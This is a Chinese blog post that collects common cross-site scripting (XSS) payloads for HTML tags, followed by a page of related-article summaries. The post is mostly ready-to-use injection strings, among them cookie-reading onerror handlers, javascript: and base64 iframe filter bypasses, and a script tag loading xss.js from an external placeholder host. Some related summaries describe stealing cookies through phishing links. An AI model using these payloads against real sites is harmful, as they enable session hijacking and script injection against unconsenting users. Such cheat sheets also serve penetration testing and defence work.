xss 常用语句

原创 已于 2024-03-28 16:57:25 修改 · 1.2k 阅读 · 10 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#javascript #前端 #html
于 2024-03-28 16:53:34 首次发布
本文详细列举了各种HTML标签中可能存在的XSS注入点,如<img>、<script>、<body>、<iframe>、<embed>等,并提醒读者这些代码可能导致的安全威胁。作者强调实验性质,同时指出滥用可能导致的实际后果并非作者责任。
Python3.8

Python3.8

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

<img> 标签:
<img src=1 onerror=alert(document.cookie)>    //弹cookie
<img src=1 onerror=alert(/hck/)>
<img src=1 onerror=alert("hck")>
<img src=1 onerror=alert(123)>    //对于数字,可以不用引导
<img src="javascript:alert("xss");">
<img dynsrc="javascript:alert('xss')">
<img lowsrc="javascript:alert('xss')">

script标签:
<script>alert(1)<script>
<script src=http://xxx.com/xss.js></script>   //引用外部的xss
<script> alert("hack")</script>   
<script> alert(document.cookie)</script>

body 标签:
<body onload=alert("xss")>
<body background="javascript:alert("xss")">


iframe 标签:
<iframe srcdoc="<img src=x onerror=alert(document.domain)>"></frame>     --弹ip
<iframe srcdoc="<img src=x onerror=alert(1)>"></frame>

<embed src=//14.rs>   ---绕过的可能性很大,
<audio controls ondurationchange=print(1) id=bngvse><source src=1.mp3 type=audio/mpeg></audio>
<iFrAme/src=jaVascRipt:alert.bind()(1) class=bngvse></iFramE>
<iframe srcdoc="<input onauxclick=alert(1)>" class=bngvse></iframe>

点击:
<button src=1 onclick=alert("你好")>

<img/src=1 onerror=alert(1) />       --反射型
<a href="javascript:confirm('a')" >1</a >
<iframe src=    "javascript:alert('iframe')" width    = "0" height        = "0"/>
–!><script>prompt(1)</script>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYmFzZTY0X2lmcmFtZScpPC9zY3JpcHQ+">

声明:以上xss语句仅用于实验,利用以上语句对某用户、企业、业务造成影响的,一切与作者无关。

您可能感兴趣的与本文相关的镜像

Python3.8

Python3.8

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

XSS漏洞-03】XSS漏洞语句构造和绕过方法实例
m0_64378913的博客
05-14 4955
目录1 XSS语句构造方式1.1 第一种:利用[<>]构造HTML/JS语句1.2 第二种:利用javascript:伪协议1.3 第三种:事件驱动1.4 第四种:利用CSS(层叠样式脚本)1.5 其他标签及手法2 XSS语句变形及绕过2.1 第一种:大小写混编2.2 第二种:**双写绕过**。2.3 第三种:**引号的使用**2.4 第四种:使用 [/] 代替空格2.5 第五种:在一些关键字内插入回车符与Tab符2.6 第六种:编码绕过2.7 第七种:拆分跨站2.8
跨站脚本漏洞
weixin_46729085的博客
09-08 4217
XSS漏洞 一、文章简介 XSS漏洞是Web应用程序中最常见的漏洞之一。如果您的站点没有预防XSS漏洞的固定方法,那么很可能就存在XSS漏洞。 这篇文章将带你通过代码层面去理解三个问题: 什么是XSS漏洞? XSS漏洞有哪些分类? 如何防范XSS漏洞? 二:三大分类 反射型XSS:<非持久化> 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。 存储型XSS:&...
XSS语句大全
ch_ycc的博客
04-24 4055
10、t_sort="type="button" onfocus="alert(1) onfocus-当窗口获得焦点时运行脚本。13、Cookies传 user=" onclick="alert(1)" type="text"12、User agent传 "type="button" onclick="alert(1)11、Referer传" type="button" onclick="alert(1)转化为实体字符: javascript:alert('xss')
常见Web安全漏洞防护
最新发布
qq_26394753的博客
05-01 471
本文系统介绍了Web应用常见安全漏洞及防护方案。主要内容包括:1)OWASP Top 10安全风险概览,重点分析访问控制失效、加密失败、注入等高风险漏洞;2)构建多层次防护体系,涵盖应用层防护(输入验证、输出编码等)、基础设施安全(HTTPS、WAF等)和运维监控;3)详细解析XSS攻击原理与类型(存储型、反射型、DOM型),提供Spring Security配置方案和HTML转义工具类实现。文章通过图表和代码示例直观展示漏洞原理和防御措施,帮助开发者构建安全可靠的Web应用系统。
网安入门17-XSS(打Cookie)
m0_61499194的博客
02-27 1852
来到这个实战网站,两个浏览器注册两个账号zyh666,和zyh999,由于同源策略,Edge和火狐登录同一URL不共享cookie。接下来开始攻击,假设这个钓鱼链接被zyh999点击,那么我们就收到了zyh999的Cookie!此时4个步骤以及完成了第一步,接下来的中间人可以选择一个云服务器,也可以用一个XSS平台。反射型也是一样的,在Edge中存好,用Chrome打开,弹的是两个不同的Cookie。查看代码选项,恶意JS选择第一条payload复制到网站的URL中,构造钓鱼链接。实战打Cookie成功。
XSS大全
weixin_46601374的博客
03-01 9054
XSS的原理和特性 xss:将用户的输入当作前端代码执行 注入攻击的本质,是把用户输入的数据当做代码执行。 这里有两个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据 html:定义了网页的结构 css:美化页面 js:可以操浏览器 XSS主要拼接的是什么 SQL注入拼接的是操作数据库的SQL语句XSS拼接的是网页的HTML代码,一般而言我们是可以拼接出合适的HTML代码去执行恶意的JS语句(总结:xss就是拼接恶意的HTMLxss
XSS | XSS 常用语句以及绕过思路
Blue17 の 小窝
10-01 8678
以确保文本在不同系统之间可以无差错的转换和显示。由于 ASCII 码已经广泛使用并且很好地满足了英文字符的编码需求,Unicode 在设计时决定保留 ASCII 编码的字符集,并将其作为 Unicode 编码的一个子集。因此,
Web渗透实战--XSS 常用语句以及绕过思路
lza20001103的博客
02-12 1655
Web渗透实战--XSS 常用语句以及绕过思路
D8 跨站脚本(XSS)(附XSS注入常用语句
m0_60071324的博客
08-11 1643
跨站脚本 (XSS) 攻击发生在 数据通过不受信任的来源(最常见的是 Web 请求)进入 Web 应用程序。 数据包含在发送给 Web 用户的动态内容中,而无需针对恶意内容进行验证。 发送到网络浏览器的恶意内容通常采用一段 JavaScript 的形式,但也可能包括 HTML、Flash 或浏览器可能执行的任何其他类型的代码。基于 XSS 的攻击种类几乎是无限的,但它们通常包括向攻击者传输隐私数据,如 cookie 或其他会话信息,将受害者重定向到攻击者控制的网页内容,或在用户机器上执行其他恶意操作以易
XSS注入常用语句
weixin_33781606的博客
03-14 1477
<script>alert('hello,gaga!');</script> //经典语句,哈哈! >"'><img src="javascript.:alert('XSS')"> >"'><script>alert('XSS')</script> <table background='jav...
XSS 绕过常用语句
Mr.Huang_的博客
09-16 5013
XSS 绕过常用语句 写在最前面::: 下文中 alert 都可以由 prompt 代替 最常用XSS 漏洞测试代码: <script>prompt("XSS")</script> <SCRIPT SRC=http://damit5.ml/xss.js></SCRIPT> 在输入(Input)标签里 <INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>
XSS漏洞(二)
不秃头的程序Yang
05-15 3204
一、xss测试语句 在网站是否存在xss漏洞时,应该输入一些标签如<、>输入后查看网页源代码是否过滤标签,如果没过滤,很大可能存在xss漏洞。 常用的测试语句: <h5>1</h5> <span>1</span> <script>console.log(1);</script> 闭合: "><span>x</span> '><span>x</span> 单行注释:
Web安全原理剖析(十七)——XSS常用语句及编码绕过
Phantom03167的博客
11-01 9267
XSS常用语句及编码绕过
xss 语句大全
kaosini的专栏
06-12 1797
转载地址:http://blog.sina.com.cn/s/blog_3f595e9e010007pf.html alert(document.cookie) ='>cript>alert(document.cookie) alert(document.cookie) alert(vulnerable) %3Cscript%3Ealert('XSS')%3C/script%3E
XSS触发语句小结
7Riven's blog
01-01 2518
一、标准语句 <script>alert(/XSS/)</script> 二、尝试大小写 <sCript>alert(1)</scRipt> 三、使用<img>标签 1、windows事件 <img src="x" onerror=alert(1)> <img src="1" onerror=eval("...
XSS攻击
橙子的博客
01-02 2984
XSS攻击 原理 人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,有人将跨站脚本攻击缩写为XSSXSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实...
【精选】【XSS漏洞03】XSS漏洞验证、语句构造与绕过方法
zzz6583zz的博客
06-12 1034
了解漏洞验证相关概念含义;掌握XSS漏洞验证的方法;掌握XSS语句构造的5种方法;掌握XSS语句绕过的8种方法。
XSS语句
2301_76786857的博客
01-20 1718
跨站脚本攻击(XSS)是一种常见的网络攻击手段,攻击者通过在目标网站中注入恶意脚本,获取用户敏感信息,如用户名、密码等,从而达到盗取用户数据的目的。
XSS漏洞03】XSS漏洞验证、语句构造与绕过方法
热门推荐
Fighting_hawk的博客
02-24 1万+
1. 了解漏洞验证相关概念含义; 2. 掌握XSS漏洞验证的方法; 3. 掌握XSS语句构造的5种方法; 4. 掌握XSS语句绕过的8种方法。
真传一句话之XSS
sixvvd的博客
10-15 1445
XSS全称(Cross Site Scripting)跨站脚本攻击,为了避免和CSS层叠样式表名称冲突,所以改为了 XSS,是最常见的Web应用程序安全漏洞之一,位于OWASP top 10 2013/2017年度分别为第三名和第七 名,XSS是指攻击者在网页中嵌入客户端脚本,通常是JavaScript编写的危险代码,当用户使用浏览器浏 览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

柳岸花又明

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值